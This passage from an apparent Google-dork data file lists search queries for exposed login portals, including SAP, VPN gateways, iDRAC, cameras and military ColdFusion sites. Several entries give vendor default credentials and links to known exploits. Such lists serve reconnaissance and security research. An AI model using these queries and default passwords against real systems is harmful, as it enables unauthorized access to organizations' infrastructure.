@ItsKarl0z\r\n\r\n\r\n++ SAP NetWeaver Login Portals ++\r\n\r\ninurl:/irj/portal\r\n- Finds SAP NetWeaver login portals\r\n- Finds SAP Enterprise login portals\r\n- Finds SAP NetWeaver server entry points\r\n- Finds SAP NetWeaver servers of large companies\r\n- 18 Vulnerabillites on Exploit DB available for SAP NetWeaver at the time of writing:\r\n - https://www.exploit-db.com/exploits/44647\r\n - https://www.exploit-db.com/exploits/44292\r\n - https://www.exploit-db.com/exploits/40816\r\n - \u2026\u2026. just search SAP NetWeaver and the desired Version\r\n- 10.600 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nSome of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing"}, {"dork": "inurl:infoviewapp", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP InfoView Business Objects ++\r\n\r\ninurl:infoviewapp\r\n- Potential access to sensitive information\r\n- Login portals\r\n- Server entry points\r\n- Server\r\n- Potential to manipulate business objects\r\n- 2 Cross-Site Scripting Vulnerabillites available:\r\n - https://www.exploit-db.com/exploits/36936\r\n - https://www.exploit-db.com/exploits/36935\r\n- 3.680 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nSome of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing"}, {"dork": "filetype:cwr inurl:apstoken", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP crystal reports business enterprise login ++\r\n\r\nfiletype:cwr inurl:apstoken\r\n- Login portals for crystal reports\r\n- Enterprise reports\r\n- Error messages\r\n- Possible Cross-Site Scripting\r\n - https://www.exploit-db.com/exploits/32882\r\n- Possible Directory Traversal\r\n - https://www.exploit-db.com/exploits/16054\r\n- 7 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nCredit goes to the boys of Rapid7"}, {"dork": "inurl:/login.zul", "description": "Login panel\r\n\r\nManhNho"}, {"dork": "inurl:/pwm/public/", "description": "# Exploit Title: PWM Password Manager Directory.\r\n# Google Dork: inurl:/pwm/public/\r\n# Description: Find PWM directories with login portals and/or user registration/activation forms.\r\n# Date: 08/01/2019.\r\n# Exploit Author: Sohaib E.B.\r\n# Category: Pages Containing Login Portals"}, {"dork": "inurl:/FxCodeShell.jsp/ \"Login Form\" \"Blog Comments\"", "description": "Category : Pages containing login portals\r\n\r\nDescription : Dork for finding login portals of fxcodeshell.jsp\r\n\r\nDork : inurl:/FxCodeShell.jsp/ \"Login Form\" \"Blog Comments\"\r\n\r\nAlso try : inurl:/FxCodeShell.jsp::$DATA/\r\n\r\nDate : 10/2/2019\r\n\r\nAuthor : Manish Bhandarkar"}, {"dork": "inurl:\"/my-account-login\" | allintext:\"My Account\"", "description": "Category : Pages containing login portals\r\n\r\nDescription : Dork for finding login portals where well known company\r\nwebsites hosted on famous hosting provider such as Akamai, Amazon,\r\nMicrosoft Azure, Leaseweb, weebly, Rackspace, OVH SAS, etc.\r\n\r\nDork : inurl:\"/my-account-login\" | allintext:\"My Account\"\r\n\r\nAlso try : inurl:\"/my-account/login\"\r\n\r\nDate : 10/2/2019\r\n\r\nAuthor : Manish Bhandarkar\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "intitle:vendor | supply & login | portal intext:login | email & password", "description": "Login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:pin | userid & password intitle:supplier | supply & login | portal", "description": "Login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/za/login.do", "description": "Zscaler admin login\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/adfs/services/trust", "description": "ADFS instance logins\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:rms webportal", "description": "Login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:F5Networks-SSO-Req?", "description": "BIG-IP corporate logins\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:shared/login.jsp?/ BMC arsys", "description": "More BMC remedy portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login.htm \"xpress\" password", "description": "Xpress login portals, powered by Ilantus\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login.htm \"access\" database", "description": "Several database logins\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:SSOLogin.jsp intext:\"user\"", "description": "Dork : inurl:SSOLogin.jsp intext:\"user\"\r\n\r\nDescription : this dork gives you user single sign on (SSO) jsp login portals.\r\n\r\nAuthor : botsec0"}, {"dork": "/adp/self/service/login", "description": "Category : Pages containing login portals\r\n\r\n\r\nDescription : Dork for finding to login portals of Employees and admins\r\nwhich using Automatic Data Processing Inc., commonly known as ADP, is an\r\nAmerican provider of human resources management software and services.\r\nUntil 2014, ADP was one of four American companies in the S&P 500 to have a\r\nAAA credit rating from Standard & Poor's and Moody's.\r\n\r\n\r\nEnjoy :)\r\n\r\n\r\n\r\nDork : /adp/self/service/login\r\n\r\n\r\n\r\nDate : 04/3/2019\r\n\r\n\r\nAuthor : Manish Bhandarkar\r\n\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "inurl:'/scopia/entry/index.jsp'", "description": "Search: Avaya Scopia Login Page\r\n\r\n*Google Dorks:* inurl:'/scopia/entry/index.jsp'\r\n*Default Credentials: *admin/admin\r\n\r\nAuthor: Rishabh Sharma (Lazy Hacker)"}, {"dork": "inurl:'/logon/logonServlet'", "description": "*Search: * SAP NetWeaver Application Server Java Login\r\n\r\n*Google Dorks: *inurl:'/logon/logonServlet'\r\n*Default Credentials:* TMSADM: $1Pawd2&\r\n\r\n*Author:* Rishabh Sharma (Lazy Hacker)"}, {"dork": "inurl:'/zabbix/index.php'", "description": "*Search: *Zabbix Login page (Network Monitoring Tool)\r\n*Google Dorks: *inurl:'/zabbix/index.php'\r\n*Default Credentials:* Admin:zabbix (Sometimes without login accessible)\r\n\r\n*Author:* Rishabh Sharma (Lazy Hacker)"}, {"dork": "intitle:'Centreon - IT & Network Monitoring'", "description": "*Search: * Centreon - IT & Network Monitoring Login\r\n*Google Dorks: *intitle:'Centreon - IT & Network Monitoring'\r\n*Default Credentials:* admin/centreon\r\n\r\n*Author:* Rishabh Sharma (Lazy Hacker)"}, {"dork": "\"online learning powered by bksb\"", "description": "Find school & college login portals for BKSB.\r\n~ CrimsonTorso"}, {"dork": "intitle:\"iDRAC-login\"", "description": "Search: Integrated Dell Remote Access Controller - Enterprise\r\nGoogle Dorks: intitle:\"iDRAC-login\"\r\nCategory : Various Online Devices\r\n\r\nExploit Author:- Harsh Mukeshbhai Joshi"}, {"dork": "intitle:\"Log In - Juniper Web Device Manager\"", "description": "Search: Log In - Juniper Web Device Manager\r\nGoogle Dorks: intitle:\"Log In - Juniper Web Device Manager\"\r\nCategory : Various Online Devices\r\n\r\nExploit Author:- Harsh Mukeshbhai Joshi"}, {"dork": "intitle:.:: Welcome to the Web-Based Configurator::.", "description": "Search: zyxel Router Login Page\r\nGoogle Dorks: intitle:.:: Welcome to the Web-Based Configurator::.\r\nCategory : Various Online Devices\r\n\r\nExploit Author:- Harsh Mukeshbhai Joshi"}, {"dork": "site:com inurl:b2blogin ext:cfm | jsp | php | aspx", "description": "Dork : site:com inurl:b2blogin ext:cfm | jsp | php | aspx\r\n\r\nDescription : this dork gives you all type of b2b login portals.\r\n\r\nAuthor : botsec0"}, {"dork": "inurl:7474/browser intitle:Neo4j", "description": "Login pages of Neo4j graph database. Some pages can even access the\r\ndatabase.\r\n\r\nAuthor : Raj Kiran P"}, {"dork": "intitle:OmniDB intext:\"user. pwd. Sign in.\"", "description": "Login page of OmniDB database.\r\n\r\nAuthor : Raj Kiran P"}, {"dork": "inurl:ctl/Login/Default.aspx", "description": "The Dork: inurl:ctl/Login/Default.aspx reveals the CMS Login page for the Dot Net Nuke CMS.\r\n\r\nVersions DNN 7.1.0 and earlier / DNN 6.2.8 and earlier are vulnerable to XXS ( CVE-2013-4649 ). \r\n\r\nThis can be tested by reviewing the page source code and searching for default.css where the version will precede it."}, {"dork": "intitle:\"qBittorrent Web UI\" inurl:8080", "description": "intitle:\"qBittorrent Web UI\" inurl:8080\r\n\r\ndefault: admin // adminadmin"}, {"dork": "site:mil ext:cfm inurl:login.cfm", "description": "Dork : site:mil ext:cfm inurl:login.cfm\r\n\r\nDescription : this dork will give you coldfusion login portals of mil websites.\r\n\r\nAuthor : botsec0"}, {"dork": "inurl:+CSCOE+/logon.html", "description": "# Google Dork: inurl:+CSCOE+/logon.html\r\n# Description: Google Dork to find Cisco Asa webvpn login pages\r\n# Date: 2019-05-06\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "inurl:login.aspx filetype:aspx intext:\"TMW Systems\"", "description": "Transportation Analytics Login Portals.\r\n\r\nDecoy"}, {"dork": "inurl:\"/Shop/auth/login\"", "description": "Category : Pages containing login portals\r\n\r\nDescription : Dork for finding login portals\r\n\r\nDork : inurl:\"/Shop/auth/login\"\r\n\r\nDate : 11/5/2019\r\n\r\nAuthor : Manish Bhandarkar\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "inurl:office365 AND intitle:\"Sign In | Login | Portal\"", "description": "Dork:\r\ninurl:office365 AND intitle:\"Sign In | Login | Portal\"\r\n\r\nDescription:\r\nOffice 365 Login Portals"}, {"dork": "intext:\"Login | Password\" AND intext:\"Powered by | username\" AND intext:Drupal AND inurl:user", "description": "Dork:\r\nintext:\"Login | Password\" AND intext:\"Powered by | username\" AND\r\nintext:Drupal AND inurl:user\r\n\r\nDescription:\r\nDrupal login portals"}, {"dork": "intitle:\"oracle bi publisher enterprise login\"", "description": "Google dork description: Sites running Oracle Business Intelligence\r\n\r\nGoogle Search: intitle:\"oracle bi publisher enterprise login\"\r\n\r\nSubmitted by: Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "inurl:/login.rsp", "description": "Find online DRV/XVR login page.\r\nDork : inurl:/login.rsp\r\nAuthor : Islam Uddin (H4wK) https://h4wk-0x00.blogspot.com/"}, {"dork": "intitle:\"admin console\" inurl:login site:\"*.edu\"|site:\"*.gov\"|site:\"*.net\" -site:*.com -help -guide -documentation -release -notes -configure -support -price -cant", "description": "I have discovered a google dork that reveals a number of admin\r\nconsole pages for websites ending in edu / gov or net.\r\n\r\n*Google Dork*\r\n\r\nintitle:\"admin console\" inurl:login site:\"*.edu\"|site:\"*.gov\"|site:\"*.net\"\r\n-site:*.com -help -guide -documentation -release -notes -configure -support\r\n-price -cant\r\n\r\n*Dates: *21-05-2019\r\n\r\n*Dork Author:* acc3ssp0int"}, {"dork": "\"please sign in\" \"sign in\" \"gophish\" +\"login\"", "description": "Description: Find login portal pages for Gophish script\r\n setups. Default login creds are admin:gophish.\r\nCategory: Pages Containing Login Portals\r\n\r\nAuthor: edm0nd https://twitter.com/edmond_major"}, {"dork": "intitle:\"iLO Login\" intext:\"Integrated Lights-Out 3\"", "description": "intitle:\"iLO Login\" intext:\"Integrated Lights-Out 3\"\r\n\r\nDescrption: Find HP / HPE ilo 3 pages exposed to the Internet and\r\ndiscovered by Google.\r\n\r\nAuthor:\r\nFabio Stoll (Fastor)"}, {"dork": "\"Web Analytics powered by Open Web Analytics - v: 1.6.2\"", "description": "Find login portals for websites using Open Web Analytics.\r\n\r\nBy GnosticPlayers"}, {"dork": "intitle:\"Outlook Web Access\" | \"Outlook Web app\" -office.com -youtube.com -microsoft.com", "description": "Outlook Web Access (OWA) login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "intext:\"Sign in with your organizational account\" login -github.com", "description": "Office365 login pages.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "inurl:\"CookieAuth.dll?GetLogon?\" intext:log on", "description": "Some Microsoft & Netscaler login portals.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "-youtube.com login | password | username intitle:\"assessment\"", "description": "Login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "inurl:9000 AND intext:\"Continuous Code Quality\"", "description": "Category: Pages containing login portals\r\nDescription: Dork for publicly available SonarQube dashboard pages\r\nDork: inurl:9000 & intext:\"Continuous Code Quality\"\r\nDate: 05/06/2019\r\nAuthor: Goktug Serez"}, {"dork": "inurl:\"/fuel/login\"", "description": "Fuel CMS Login Panels"}, {"dork": "intitle:\"netscaler gateway\" intext:password \"please log on\"", "description": "Netscaler web app log in portals.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "inurl:\"/vpn/tmindex.html\" vpn", "description": "Netscaler & Citrix Gateway VPN login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"evetsites\" \"Login\"", "description": "Login portals for all sites hosted by popular veterinary hosting platform eVetSites\r\n\r\nZerconil"}, {"dork": "inurl:/admin/index.php?module=config", "description": "Finding the Mybb admin login page:\r\ninurl:/admin/index.php?module=config\r\n\r\nReza Abasi"}, {"dork": "inurl:/admin/index.php", "description": "Finding the admin login page:\r\n\r\ninurl:/admin/index.php\r\ninurl:/admin/index.php intitle:\"Login\"\r\n\r\nReza Abasi"}, {"dork": "inurl:/en-US/account/login?return_to=", "description": "# Google Search: inurl:/en-US/account/login?return_to=\r\n# Google Dork Description: [Servers that running Splunk Enterprise (SIEM)]\r\n# Date: [12-July-2019]\r\n# Exploit Author: [Zayed AlJaberi]\r\n# Vendor Homepage: [https://www.splunk.com/]"}, {"dork": "intext:Grafana New version available! -grafana.com -grafana.org inurl:/login", "description": "# Exploit Title: Grafana login\r\n\r\n# Google Dork: intext:Grafana New Version available! -grafana.com\r\n-grafana.org inurl:/login\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:simple/view/login.html", "description": "# Exploit Title: Huawei Lan Switch Login\r\n\r\n# Google Dork: inurl:simple/view/login.html\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:Dashboard.jspa intext:\"Atlassian Jira Project Management Software\"", "description": "Page Containing Login Portals\r\nTargeted platform: Jira Project and Issue Tracking Software\r\nDork: inurl:Dashboard.jspa intext:\"Atlassian Jira Project Management Software\""}, {"dork": "site:*/login/login.php", "description": "Finding login page of php\r\nsite:*/login/login.php\r\n\r\nReza Abasi"}, {"dork": "inurl:/admin/login.php", "description": "Finding login page of php sites\r\ninurl:/admin/login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:wp/wp-login.php", "description": "Finding login page of wordpress\r\n\r\ninurl:wp/wp-login.php\r\nsite:*/wp-login.php intitle:\"Log In\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/site/login.php", "description": "# Exploit Title: Login PAge\r\n\r\n# Google Dork: inurl:/site/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/client/login.php", "description": "# Exploit Title: Client Login\r\n\r\n# Google Dork: inurl:/client/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/guest/login.php", "description": "# Exploit Title: Guest Login\r\n\r\n# Google Dork: inurl:/guest/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/administrator/login.php", "description": "# Exploit Title: Administrator Login\r\n\r\n# Google Dork: inurl:/administrator/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/system/login.php", "description": "# Exploit Title: System Login\r\n\r\n# Google Dork: inurl:/system/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/student/login.php", "description": "# Exploit Title: Student login\r\n\r\n# Google Dork: inurl:/student/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/teacher/login.php", "description": "# Exploit Title: Teacher login page\r\n\r\n# Google Dork: inurl:/teacher/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/employee/login.php", "description": "# Exploit Title: Employee Login Page\r\n\r\n# Google Dork: inurl:/employee/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/index.aspx/login", "description": "inurl:/index.aspx/login\r\ninurl:\"/index.aspx?login=\" intitle:\"Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:amazonaws.com inurl:login.php", "description": "Finding login page of php sites\r\nsite:amazonaws.com inurl:login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:cgi/login.pl", "description": "Dorks: \r\n\r\ninurl:cgi/login.pl\r\ninurl:cgi/login.pl intext:\"Matrix Science\"\r\n\r\n-M. Cory Billington"}, {"dork": "site:*/auth intitle:login", "description": "Finding login page of sites\r\nsite:*/auth intitle:login\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl: admin/login.aspx", "description": "Google Dork: inurl: admin/login.aspx\r\nDate: 08/02/2019\r\nAuthor: Adrian Roy Lorica"}, {"dork": "inurl:/login/index.jsp -site:hertz.*", "description": "Finding login page of sites\r\ninurl:/login/index.jsp -site:hertz.*\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:login.cgi", "description": "pages containing login portal\r\n\r\ninurl:login.cgi\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/joomla/administrator", "description": "Joomla admin login portal\r\n\r\nsite:*/joomla/administrator\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:accounts.*.com/signin/", "description": "login portal\r\n\r\nsite:accounts.*.com/signin/\r\nsite:account.*.com/signin/\r\nsite:accounts.*.*/signin/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/index.jsp intitle:\"login\"", "description": "login portal\r\n\r\nsite:*/index.jsp intitle:\"login\"\r\nsite:\"/index.jsp\" intitle:\"Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/login/auth", "description": "login portal\r\n\r\nsite:*/login/auth\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:adminpanel/index.php", "description": "GOOLGE DORK\r\nDork: inurl:adminpanel/index.php\r\nAuthor: Sathishshan\r\nInfo: Contains sensitive directory information of adminpanel login"}, {"dork": "site:portal.*.com/signin/", "description": "# Exploit Title: Sign-in Portal Subdomain\r\n\r\n# Google Dork: site:portal.*.com/signin/\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "site:admin.*.com/signin/", "description": "# Exploit Title: Signin of Admin Subdomain\r\n\r\n# Google Dork: site:admin.*.com/signin/\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "site:login.*.com/signin/", "description": "# Exploit Title: Sign-in for Subdomain Site\r\n\r\n# Google Dork: site:login.*.com/signin/\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "site:conf.*.com/signin/", "description": "# Exploit Title: Sign-in for Conference Subdomain site\r\n\r\n# Google Dork: site:conf.*.com/signin/\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "site:social.*.com/signin/", "description": "# Exploit Title: Sign-in Social Website Subdomain\r\n\r\n# Google Dork: site:social.*.com/signin/\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:login_user.asp", "description": "login portal\r\n\r\ninurl:login_user.asp\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:sign in inurl:/signin", "description": "login portal\r\n\r\nintitle:sign in inurl:/signin\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"sign in\" inurl:login.aspx", "description": "login portal\r\n\r\nintitle:\"sign in\" inurl:login.aspx\r\n\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/user/login", "description": "login portal\r\n\r\nsite:*/user/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/account/login", "description": "login portal\r\n\r\nsite:*/account/login\r\ninurl:/account/login\r\nsite:login.*.*/account/login\r\nsite:*/account/auth/\r\nsite:*/account/recovery/\r\nsite:*/account/recover/\r\nsite:*/account/forget-pass/\r\nsite:*/account/forget/\r\nsite:*/account/userlogin/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/forum/ucp.php?mode=login", "description": "login portal phpBB\r\n\r\nsite:*/forum/ucp.php?mode=login\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:memberlist.php?mode=viewprofile", "description": "login portal phpBB\r\n\r\ninurl:memberlist.php?mode=viewprofile\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/sign-in", "description": "login portal\r\n\r\nsite:*/sign-in\r\nsite:*/user/sign-in/\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"EdgeOS\" intext:\"Please login\"", "description": "Dork: intitle:\"EdgeOS\" intext:\"Please login\"\r\nAuthor: M. Cory Billington\r\nInfo: Contains login portals for Ubiquiti devices running EdgeOS"}, {"dork": "inurl:user_login.php", "description": "Login Portals\r\n\r\nMert Yeniay"}, {"dork": "intitle:\"Web Management Login\"", "description": "Dork: intitle:\"Web Management Login\" \r\nAuthor: M. Cory Billington\r\nInfo: Contains login portals for Brocade switches"}, {"dork": "site:*/users/login_form", "description": "login portal\r\n\r\nsite:*/users/login_form\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/access/unauthenticated", "description": "login portal\r\n\r\nsite:*/access/unauthenticated\r\nsite:*/access/logon/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:account.*.*/login", "description": "login portal\r\n\r\nsite:account.*.*/login\r\nsite:accounts.*.*/login/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/quicklogin.php", "description": "login portal\r\n\r\nsite:*/quicklogin.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/auth/login.aspx", "description": "login portal\r\n\r\nsite:*/auth/login.aspx\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi-bin/login.html", "description": "Online devices\r\n\r\nsite:*/cgi-bin/login.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "\"viostor system\"", "description": "online device login page:\r\n\r\n\"viostor system\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:/*:8081/nexus/#welcome -inurl:\"/nexus/content/\"", "description": "Nexus repository Login Portal:\r\nsite:/*:8081/nexus/#welcome -inurl:\"/nexus/content/\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:*admin_login.php", "description": "This Dork Can Be Used To Find Login Pages.\r\n\r\nHere is the Dork: inurl:*admin_login.php"}, {"dork": "inurl:/manage/login.html", "description": "Login Portal:\r\n\r\ninurl:/manage/login.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*:8888/login.aspx", "description": "Login Pages:\r\n\r\nsite:*:8888/login.aspx\r\ninurl::8888/login.php\r\ninurl::8888/login.aspx\r\n\r\nReza Abasi"}, {"dork": "site:/*:81 -site:/*:8080 intitle:\"::: Login :::\"", "description": "Login Page for online cams:\r\n\r\nsite:/*:81 -site:/*:8080 intitle:\"::: Login :::\"\r\nsite:/*:88 -site:/*:8080 intitle:\"::: Login :::\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/login.php?do=login\"", "description": "Login page :\r\n\r\ninurl:\"/login.php?do=login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/src/login.php", "description": "Login page :\r\n\r\nsite:*/src/login.php\r\nsite:*/php/login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/forum/login/", "description": "Forum Login Page:\r\n\r\nsite:*/forum/login/\r\nsite:*/forums/login.php\r\ninurl:\"/forums/login.php?do=lostpw\"\r\nsite:*/forums/admincp/\r\nsite:*/forum/lost-password/\r\nsite:*/forum/lostpassword/\r\nsite:*/forum/login.php?action=forget\r\nsite:*/forum/reset/ intitle:\"Reset password\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/logon/logonpoint/tmindex.html", "description": "Login Page:\r\n\r\nsite:*/logon/logonpoint/tmindex.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/logon/ intitle:\"Sign In\"", "description": "Login page :\r\n\r\nsite:*/logon/ intitle:\"Sign In\"\r\nsite:*/logon/ intitle:\"login\"\r\nsite:*/logon/ intitle:\"Logon\" inurl:/Logon.aspx\r\nsite:*/logon/ intitle:\"Logon\" inurl:/logon.html\r\nsite:*/logon/ intitle:\"Logon\" inurl:/logon.jsp\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/sign_in.aspx", "description": "Login page :\r\n\r\nsite:*/sign_in.aspx\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/oaam_server/login.do", "description": "Login page :\r\n\r\ninurl:/oaam_server/login.do\r\nsite:*/login.do intitle:\"Sign On\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Sales Central - Logon\"", "description": "Login page :\r\n\r\nintitle:\"Sales Central - Logon\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:/auth.*.*/login", "description": "Login page :\r\n\r\nsite:/auth.*.*/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/admin.login.php", "description": "Login page :\r\n\r\ninurl:/admin.login.php\r\nsite:*/admin.login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/admin/login.html", "description": "Login page :\r\n\r\nsite:*/admin/login.html\r\nsite:*/admin/Admin-Login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:admin. intitle:\"admin login\"", "description": "Login page :\r\n\r\ninurl:admin. intitle:\"admin login\"\r\nintitle:\"admin login\" inurl:/admin login\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Calendarix Admin Login\"", "description": "Login page :\r\n\r\nintitle:\"Calendarix Admin Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/admin/cal_login.php", "description": "Login page :\r\n\r\ninurl:/admin/cal_login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/Login/Admin intitle:\"Admin Login\"", "description": "Login page :\r\n\r\ninurl:/Login/Admin intitle:\"Admin Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/admin-login intitle:\"Admin Login\"", "description": "Login page :\r\n\r\nsite:*/admin-login intitle:\"Admin Login\"\r\ninurl:\"/admin-login?view=reset\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:signin.*.* intitle:\"login\"", "description": "Login page :\r\n\r\nsite:signin.*.* intitle:\"login\"\r\nsite:mail.*.* intitle:\"login\"\r\nsite:signin.*.*/ intitle:\"signin\" -facebook.com\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:sso.*.* intitle:\"Login\"", "description": "Login page :\r\n\r\nsite:sso.*.* intitle:\"Login\"\r\nsite:ssologin.*.* intitle:\"Single sign on\"\r\nsite:*/sso/XUI/#login/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:admin.*.* intitle:\"Admin Login\"", "description": "Login page :\r\n\r\nsite:admin.*.* intitle:\"Admin Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:login.*.* intitle:\"Admin Login\"", "description": "Login page :\r\n\r\nsite:login.*.* intitle:\"Admin Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/adminLogin/login/", "description": "Login page :\r\n\r\nsite:*/adminLogin/login/\r\nsite:*/Login/adminLogin\r\nsite:*/adminlogin.*\r\ninurl:/adminlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/admin/ intext:\"login\"", "description": "Login page :\r\n\r\ninurl:/admin/ intext:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/admin/admin.php intitle:\"login\"", "description": "Login page :\r\n\r\ninurl:/admin/admin.php intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:member.*.* intitle:\"login\"", "description": "Login page :\r\n\r\nsite:member.*.* intitle:\"login\"\r\nsite:member.*.* intitle:\"signin\"\r\nsite:member.*.* intitle:\"logon\"\r\nsite:*/members.php intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/users/sign_in", "description": "Login page :\r\n\r\ninurl:/users/sign_in\r\ninurl:/users/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/member/login", "description": "Login page :\r\n\r\ninurl:/member/login\r\ninurl:/member/signin OR inurl:/member-signin/\r\ninurl:/member/logon\r\ninurl:\"/member.php?action=activate\"\r\ninurl:\"/member.php\" intitle:\"Login\"\r\ninurl:/memberlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/account/logon intitle:\"Log On\"", "description": "Login Pages:\r\n\r\ninurl:/account/logon intitle:\"Log On\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/account/signin intitle:\"signin\"", "description": "Login Pages:\r\n\r\ninurl:/account/signin intitle:\"signin\"\r\n\r\nReza Abasi(Turku"}, {"dork": "inurl:/wp-admin/admin.php intitle:\"Log In\"", "description": "wordpress Login Pages:\r\n\r\ninurl:/wp-admin/admin.php intitle:\"Log In\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:mail.*.*/auth", 